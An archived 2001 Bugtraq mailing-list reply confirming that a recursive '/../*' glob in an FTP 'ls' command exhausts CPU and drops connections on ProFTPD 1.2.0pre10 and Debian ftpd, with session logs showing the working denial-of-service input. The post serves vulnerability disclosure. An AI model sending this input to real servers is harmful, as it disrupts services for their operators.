Bugtraq mailing list archives
RE: Multiple-Vendor-FTP-Vuln. (old?)
From: "E. van Elk" <evelk () dsv nl>
Date: Tue, 21 Aug 2001 01:41:14 +0200
At 00:43 21-8-2001, you wrote: >Couldn't reproduce on Debian 2.2.... > >isp-server-03:/# proftpd -v > - ProFTPD Version 1.2.0pre10 I tested it on my Debian 2.2 machine and: :/# proftpd -v - ProFTPD Version 1.2.0pre10 Verbonden met . 220 ProFTPD 1.2.0pre10 Server (Debian) [] Gebruiker ( :(none)): 331 Password required for . Wachtwoord: 230 User logged in. ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. 550 No files found. ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. Verbinding verbroken door externe host. ftp>CPU goes to 99.1 % and after the second attempt the connection to the server is broken..
Debian 2.2 ftpd 0.11-8potato.1 is vulnerable too: Verbonden met . 220 FTP server (Version 6.2/OpenBSD/Linux-0.10) ready. Gebruiker ( :(none)): 331 Password required for . Wachtwoord: 230- Linux 2.2.19pre17 #1 Tue Mar 13 22:37:59 EST 2001 i686 unknown 230- 230 User logged in. ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. 550 not found ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. Verbinding verbroken door externe host. ftp>CPU goes to 99.1 % and after the second attempt the connection to the server is broken..
Current thread:
- Multiple-Vendor-FTP-Vuln. (old?) Enrico Kern (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) skip (Aug 20)
- RE: Multiple-Vendor-FTP-Vuln. (old?) jeev (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Scott Dier (Aug 20)
- RE: Multiple-Vendor-FTP-Vuln. (old?) Mike Jakubik (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Bernhard Rosenkraenzer (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Roman Drahtmueller (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Dmitriy Kropivnitskiy (Aug 21)
- <Possible follow-ups>
- Re: Multiple-Vendor-FTP-Vuln. (old?) Michael Faurot (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Robert van der Meulen (Aug 20)
- RE: Multiple-Vendor-FTP-Vuln. (old?) E. van Elk (Aug 20)
- RE: Multiple-Vendor-FTP-Vuln. (old?) Michael Bellears (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Michael Faurot (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) skip (Aug 20)